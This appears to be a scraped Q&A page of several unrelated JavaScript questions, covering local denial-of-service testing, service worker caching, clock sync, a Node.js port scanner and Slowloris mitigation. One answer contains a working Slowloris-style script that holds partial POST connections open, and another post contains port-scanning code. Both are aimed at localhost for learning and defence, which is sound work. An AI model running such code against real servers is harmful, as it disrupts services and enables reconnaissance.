i would like to understand DOS (denial-of-service) attacks better and I would like to know what my options are for learning about it with an example.
i have a basic express server.
app.get('/ping', (req, res) => {
res.send({ pong: 'pong', time: new Date().valueOf(), memory: process.memoryUsage()})
})
I will separately create some javascript code that with make multiple requests to the server. but I don't know to devise strategies to try and bring down the server (consider that this is all running on localhost)
I want to see what the upper limit of making requests is possible when locally testing this. i am experiencing what is described here: Sending thousands of fetch requests crashes the browser. Out of memory
... the suggestions on that thread are more along the lines of "browser running out of memory" and that I should "throttle requests".... but I am actively trying to max out the requests the browser can make without crashing. so far my observations are that the server does not have any difficulty. (so maybe I should also make requests from my phone and tablet?)
the code have run on the browser isn't much more than:
const makeRequestAndAlogTime = () => {
const startTime = new Date().valueOf();
fetch('http://localhost:4000/ping')
.then(async (response) => {
const { time, memory } = await response.json();
console.log({
startTime: 0,
processTime: time - startTime,
endTime: new Date().valueOf() - startTime,
serverMemory: memory,
browserMemory: performance['memory']
})
})
}
for(let x = 0; x < 100; x++) {
makeRequestAndAlogTime()
}
but depending on what value I put in for the number of times to go through the for loop, performance is slower and eventually crashes (as expected)... but I want to know if there is a way I could automate determining the upper limit of requests that I can make on my browsers?
Related
I'm currently working on a small web app which should implement a cached first scenario (users download the wep app in a wifi provided base and then should be able use it offline outside)
I'm not using any framework and therefore implement the caching (SW) myself.
As I also integrate some playcanvas content (which has its own loading screen) over an iframe I was wondering what overall strategy in terms of loading would make sense.
In a similar project I simply let the service worker download the assets parallel to the (initial) load of the application.
But it came to my mind that that it would be better to implement a workflow which is closer to an native app behavior - meaning showing a overall loading screen during the service worker download process and building/showing my main application after this process is finished (or did fail -> forced network scenario or did happen before -> offline scenario). Another solution would be to show a non blocking "Assets are still being downloaded" banner.
The main thoughts leading mit to the second workflow where:
The SW-Loading screen / banner could provide better feedback to the user: "All assets downloaded - I'm safe to go offline", while the old scenario could cause issues here - successfully showing the the user the first state - while some critical files are still downloaded in the back.
With the SW-Loading screen the download process is a bit more controllable/understandable for me - as the parallel process of an SW-Download and the Playcanvas Loading for example become sequential.
It would be great if someone could provide me feedback/info:
if I'm on the right track with this second scenario for being better or it just being overhead
how / if it might be possible to implement a cheap loading screen, meaning for example 100 of 230 Files downloaded or else.
better strategies for this scenario in general
As always, thanks for any heads up in advance.
A lot of this comes down to what you want your users to experience. The underlying technology is there to accomplish any of the scenarios you outline.
For instance, if you want to show information about the precaching progress during initial service worker installation, you could do that by adding code along the lines of the following.
In your service worker:
const PRECACHE_NAME = "...";
const URLS_TO_PRECACHE = [
// ...
];
async function notifyClients(urlsCached, totalURLs) {
const clients = await self.clients.matchAll({ includeUncontrolled: true });
for (const client of clients) {
client.postMessage({ urlsCached, totalURLs });
}
}
self.addEventListener("install", (event) => {
event.waitUntil(
(async () => {
const cache = await caches.open(PRECACHE_NAME);
const totalURLs = URLS_TO_PRECACHE.length;
let urlsCached = 0;
for (const urlToPrecache of URLS_TO_PRECACHE) {
await cache.add(urlToPrecache);
urlsCached++;
await notifyClients(urlsCached, totalURLs);
}
})()
);
});
In your client pages:
// Optional: if controller is not set, then there isn't already a
// previous service worker, so this is a "first-time" install.
// If you would prefer, you could add this event listener
// unconditionally, and you'll get update messages even when there's an
// updated service worker.
if (!navigator.serviceWorker.controller) {
navigator.serviceWorker.addEventListener("message", (event) => {
const { urlsCached, totalURLs } = event.data;
// Display a message about how many URLs have been cached.
});
}
I have a game app (Electron) and a web app (testing on android chrome). That pass messages via a websocket server. I want to coordinate a countdown between the 2 processes. It doesn't have to be perfect but What I've observed is that if I run in an environment with low latency it's fine. But the more lag their is in the system it seems like the Electron app tries to start far earlier then the web app. I've tested all my math and it should synchronize but it just doesn't.
First the web app iniates the start of the countdown by passing a starting time to the game app
const timeToGameStart:number = peerConnection.timeToGameStart(); // time to game start = 3 x (the longest time it toke to pass a previous msg from game app to web app)
const currUnixTime:number = peerConnection.currUnixTime();
const startGameTime:number = currUnixTime + timeToGameStart;
const startGame:StartGame = <StartGame>{
msg_data_type:Msg_Data_Type.StartGame,
game_start_time:startGameTime
}
peerConnection.passMsg(startGame);
setTimeout(timer.start, timeToGameStart);
Below is the app portion of the code that responds to the msg passed to the server
const gameStartTime:number = (<StartGame> msgData).game_start_time;
const currUnixTime:number = ServerConnection.currUnixTime();
// if we are on time, wait till its right time else if we are late, start at the next inc 3,2,1
const countDownLength:number = 3;
if (currUnixTime <= gameStartTime) {
setTimeout(()=>startCountDown(countDownLength), currUnixTime - gameStartTime);
} else {
const timeWeAreLateBy:number = currUnixTime - gameStartTime;
const timeWeAreLateByInSec:number = Math.ceil(timeWeAreLateBy / 1000);
const shortCountDownLen:number = Math.max(countDownLength - timeWeAreLateByInSec, 0);
const timeToNextSec:number = Math.max((1000 * timeWeAreLateByInSec) - timeWeAreLateBy, 0);
setTimeout(()=>startCountDown(shortCountDownLen), timeToNextSec);
}
The problem is that these two separate processes are on separate OSs. Which both have a different definition of time. i.e. (new Date()).getTime() return different numbers. the difference was 2 seconds so the controller thought their was no lag in the connection and was telling the app to start ASAP.
The solution was I had to define a consistent measurement of time. After each app connects to the server they sync their time with the server by making a request for the time the server has.
I didn't need a super precise time sync so I used a simple algorithm that got the job done. The algorithm was trying to calculate the difference in time the process was off from the server. The formula I used was server_time_diff = server_time - (received_time - RTT/2). Now to get unified (or server time) you just need to call new Date() + server_time_diff. RTT is the time it took to request the time from the server.
Any improvement ideas to my algorithm is welcome.
I'm having an issue with calling a function in a loop, with JavaScript. As I'm new to JavaScript, I thought perhaps my approach must be wrong. Can someone help me out with the following issue?
Basically, each time I learn a new language, I try and write a port scanner in it. In Python, I used a for loop to iterate over a range of numbers, passing them in as ports to a host. It worked fine and I attempted the same approach in JavaScript, with some socket connection code I found online:
const net = require('net');
function Scanner(host, port){
const s = new net.Socket();
s.setTimeout(2000, function() { s.destroy(); });
s.connect(port, host, function () {
console.log('Open: '+ port);
});
s.on('data', function(data){
console.log(port +': ' +data);
s.destroy();
});
s.on('error', function (e) {
s.destroy();
})
}
for(let p = 15000; p < 30000; p++){
let scan = new Scanner('localhost', p);
}
In the above example, I'm iterating over a port range of 15000 to 30000. It appears to run very fast, giving me two results: port 15292 and 15393 as being open on my test vm. However, it's not picking up several ports in the 20,000 range, like 27017.
If I narrow the range from 25000 to 30000 it picks those up just fine. The problem seems to be when I have a larger range, the code isn't discovering anything after a few hits.
In looking at some other JS implementations of port scanners, I noticed the same issue. It works great when the range is 5,000 ports or so, but scale it up to 20k or 30k ports and it only finds the first few open ones.
What am I doing wrong?
Update
_ https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/ _.
Update Friday, 13th 2018:
I managed to convince the Node.js core team about setting a CVE for that.
The fix — new defaults and probably new API — will be there in 1 or 2 weeks.
Mitigate means to quiet an attack.
Everybody knows Slowloris:
HTTP Header or POST Data characters get transmitted slowly to block the socket.
Scaled that makes a much easier DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no inbuilt way to work on the header in the HTTP Server in Node.js.
I came to the question, if I can combine net and a HTTP Server for mitigating Slowloris .
The idea to `destroy` the `connection` in case of `Slowloris` is this.
http.createServer(function(req, res) {
var timeout;
net.on('data', function(chunk) {
clearTimeout(timeout);
timeout = setTimeout(function() {
req.connection.destroy();
}, 100);
};
};
The problem I can see is, both services have to listen on the same Socket on Port 80 and 443.
Do — not — know how to tackle this.
It is possible to transfer requests and responses from net to HTTP-Server and back.
But this takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is — not — feasible in sense of high available server.
I have no clue.
What can the world do to get rid of this scourge?
CVE for Apache Tomcat.
This is a serious security threat.
I think this want to be solved on C or C++ base.
I cannot write these real programmer languages.
But all of us are helped, if somebody pushes this on Github.
Because the community there once deleted my thread about mitigating Slowloris.
The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approached, such as OOP, you will probably recognize the importance behind "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handle data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc').
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiations, slow clients, etc'.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple, do not directly expose the node.js application to the internet, use a proxy layer - it exists for a reason.
I think you're taking a wrong approach for this vulnerability.
This doesn't deal with DDOS attack (Distributed Denial of Service) where many IPs are used, and when you need to continue serving some machines that are inside the same firewall as machines involved in the attack.
Often machines used in DDOS aren't real machines that have been taken over (maybe vitualized or with software to do it from different IPs).
When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.
To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: To prevent this issue, you had to have a good firewall policies against DDos attacks and massive denial services.
BUT! If you want to do something to test a Denial service with node.js, you can use this code (use only for test purposes, not for a production environment)
var net = require('net');
var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;
function Connection(h, p)
{
this.state = 'active';
this.t = Date.now();
this.client = net.connect({port:p, host:h}, () => {
process.stdout.write("Connected, Sending... ");
this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
"Content-Type: application/x-www-form-urlenconded\r\n" +
"Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
process.stdout.write("Written.\n");
});
this.client.on('data', (data) => {
console.log("\t-Received "+data.length+" bytes...");
this.client.end();
});
this.client.on('end', () => {
var d = Date.now() - this.t;
this.state = 'ended';
console.log("\t-Disconnected (duration: " +
(d/1000).toFixed(3) +
" seconds, remaining open: " +
connections.length +
").");
});
this.client.on('error', () => {
this.state = 'error';
});
connections.push(this);
}
setInterval(() => {
var notify = false;
// Add another connection if we haven't reached
// our max:
if(connections.length < maxConnections)
{
new Connection(host, port);
notify = true;
}
// Remove dead connections
connections = connections.filter(function(v) {
return v.state=='active';
});
if(notify)
{
console.log("Active connections: " + connections.length +
" / " + maxConnections);
}
}, 500);
It is as easy as this.
var http = require('http');
var server = http.createServer(function(req,res) {
res.send('Now.')
})
server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
By default, the Server's timeout value is 2 minutes, and sockets are
destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with.
var net = require('net');
var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
setInterval(function() {
client.write('Hello World.');
},10000)
});
This is only the second to best solution.
Since legit connections are terminated also.
I am having trouble consuming the response from my WebFlux server via JavaScript's new Streams API.
I can see via Curl (with the help of --limit-rate) that the server is slowing down as expected, but when I try to consume the body in Google Chrome (64.0.3282.140), it it not slowing down like it should. In fact, Chrome downloads and buffers about 32 megabytes from the server even though only about 187 kB are passed to write().
Is there something wrong with my JavaScript?
async function fetchStream(url, consumer) {
const response = await fetch(url, {
headers: {
"Accept": "application/stream+json"
}
});
const decoder = new TextDecoder("utf-8");
let buffer = "";
await response.body.pipeTo(new WritableStream({
async write(chunk) {
buffer += decoder.decode(chunk);
const blocks = buffer.split("\n");
if (blocks.length === 1) {
return;
}
const indexOfLastBlock = blocks.length - 1;
for (let index = 0; index < indexOfLastBlock; index ++) {
const block = blocks[index];
const item = JSON.parse(block);
await consumer(item);
}
buffer = blocks[indexOfLastBlock];
}
}));
}
According the the specification for Streams,
If no strategy is supplied, the default behavior will be the same as a
CountQueuingStrategy with a high water mark of 1.
So it should slow down the promise returned by consumer(item) resolves very slowly, right?
Looking at the Backpressure support in the Streams API, it seems that Backpressure information is communicated within the Streams chain and not over the network. In this case, we can assume an unbounded queue somewhere and this would explain the behavior you're seeing.
This other github issue suggests that the Backpressure information indeed stops at the TCP level - they just stop reading from the TCP socket which, depending on the current TCP window size/TCP configuration, means the buffers will be filled and then TCP flow control kicks in. As this issue states, they can't set the window size manually and they have to let the TCP stack handle things from there.
HTTP/2 supports flow control at the protocol level, but I don't know if the browser implementations leverage that with the Streams API.
I can't explain the behavior difference you're seeing, but I think you might be reading too much in the Backpressure support here and that this works as expected according to the spec.